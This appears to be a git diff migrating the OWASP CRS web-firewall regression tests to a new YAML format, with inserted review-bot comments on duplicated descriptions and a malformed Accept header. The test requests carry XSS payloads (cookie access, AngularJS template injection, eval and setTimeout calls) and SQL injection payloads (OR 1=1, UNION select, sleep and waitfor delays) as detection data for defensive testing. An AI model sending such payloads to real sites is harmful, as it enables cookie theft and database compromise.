"OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=%28document%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 10 desc: "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml index de766fa9f..5b4a9f5f3 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml 
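Review bot: In the 941370.yaml hunk, test 4 and test 5 send byte-identical payloads (`data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29"`) while test 5 is described as "Bypass using JavaScript global variables and string concatenation", which that payload does not contain; the migration carries the duplicate over unchanged. Either drop test 5 or give it a request that matches its desc, otherwise the rule has no coverage for the concatenation variant the file claims to test. Test 6 also reuses test 4's desc "Bypass using JavaScript global variables and comments in syntax" for a different payload, so with the `test_title` lines gone the two can no longer be told apart in failure output; suffixing the desc with what differs (e.g. `desc: "Bypass using JavaScript global variables and comments in syntax, whitespace around brackets"`) would fix that.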
@@ -1,24 +1,22 @@ --- meta: author: "Franziska Buehler, azurit" - description: None - enabled: true - name: 941380.yaml +rule_id: 941380 tests: - - test_title: 941380-1 + - test_id: 1 desc: "AngularJS client side template injection detection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff" - # /login?user={{constructor.constructor('alert(1)')()}} - version: HTTP/1.1 - output: - log_contains: id "941380" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff" + # /login?user={{constructor.constructor('alert(1)')()}} + version: HTTP/1.1 + output: + log: + expect_ids: [941380] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml index b412b7475..0de1e929e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml 
@@ -1,151 +1,149 @@ --- meta: author: "Franziska Buehler, Xhoenix, azurit" - description: None - enabled: true - name: 941390.yaml +rule_id: 941390 tests: - - test_title: 941390-1 + - test_id: 1 desc: "JavaScript method setInterval(code, 1)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=setInterval%28code%2C%201%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=setInterval%28code%2C%201%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 2 desc: "JavaScript method: arg=x\";setTimeout(name, 1)//" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 3 desc: "JavaScript method eval('2 + 2')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=eval%28%272%20%2B%202%27%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=eval%28%272%20%2B%202%27%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 4 desc: "JavaScript constructor new Function()" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=new%20Function%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=new%20Function%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 5 desc: "JavaScript call alert" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=alert%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=alert%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 6 desc: "JavaScript call atob" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=atob%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=atob%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 7 desc: "JavaScript call btoa" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=btoa%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=btoa%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 8 desc: "JavaScript call prompt" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=prompt%28%29" - version: HTTP/1.1 - output: - log_contains: 
id "941390" - - test_title: 941390-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=prompt%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 9 desc: "JavaScript call confirm" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=confirm%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=confirm%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml index ddecdfe8e..12cc969e8 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml 
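Review bot: Tests 8 and 9 carry a malformed quality value in the Accept header, `image/png,*/*;q=0.>`, while every other test in this hunk and in the sibling files sends `*/*;q=0.5`; the typo was already present on the removed lines and the migration reproduces it verbatim. The rule under test presumably does not inspect this header, so the assertion still holds, but a non-numeric q-value is not the browser-like baseline the rest of the suite uses and could start matching a different rule or a stricter request parser later. Since both lines are being rewritten anyway, fix them to the shared value: `Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"`.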
@@ -1,119 +1,117 @@ --- meta: author: "Andrea Menin, azurit" - description: None - enabled: true - name: 941400.yaml +rule_id: 941400 tests: - - test_title: 941400-1 + - test_id: 1 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 2 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 3 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - 
Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 4 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 5 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: 
"/get?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 6 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 7 desc: "Status Page Test - JavaScript minimal test with Reflect.sort.call``" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?test=Reflect.sort.call%60%60" - version: HTTP/1.1 - output: - log_contains: id "941400" + - 
input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?test=Reflect.sort.call%60%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml index 69fb90117..e7c61638c 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml 
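Review bot: Tests 1 through 6 all keep the identical description `desc: "JavaScript function without parentheses"`, so a failure report naming a test_id does not say which variant regressed, even though the URIs visibly differ (plain form, extra whitespace between tokens, an inserted `/**/` comment, `\u{61}lert` and `\x28` escapes, `Reflect.apply.call`). Now that the numeric `test_id` replaces the self-describing `test_title`, the desc is the only human-readable hint left. Suggest one distinguishing phrase per test, e.g. `desc: "JavaScript function without parentheses, whitespace between tokens"` for test 2 and `desc: "JavaScript function without parentheses, comment inserted before sort"` for test 3.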
@@ -2,244 +2,243 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942100.yaml +rule_id: 942100 tests: - - test_title: 942100-1 + - test_id: 1 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1234 OR 1=1" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1234 OR 1=1" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=-1839' or '1'='1" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-1839' or '1'='1" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST 
- port: 80 - uri: "/post" - data: "var=-1839\" or \"1\"=\"2" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-1839\" or \"1\"=\"2" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 4 desc: "Basic SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=2010-01-01'+sleep(20.to_i)+'" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 5 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=EmptyValue' and 526=527" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=EmptyValue' and 
526=527" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 6 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo') UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 7 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo')waitfor%20delay'5%3a0%3a20'--" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 8 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 9 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 10 desc: "Advanced SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "1'||(select extractvalue(xmltype('%toyop;" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "1'||(select extractvalue(xmltype('%toyop;" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 11 desc: "Simple function call" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=sleep(20)" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=sleep(20)" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 12 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 13 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" 
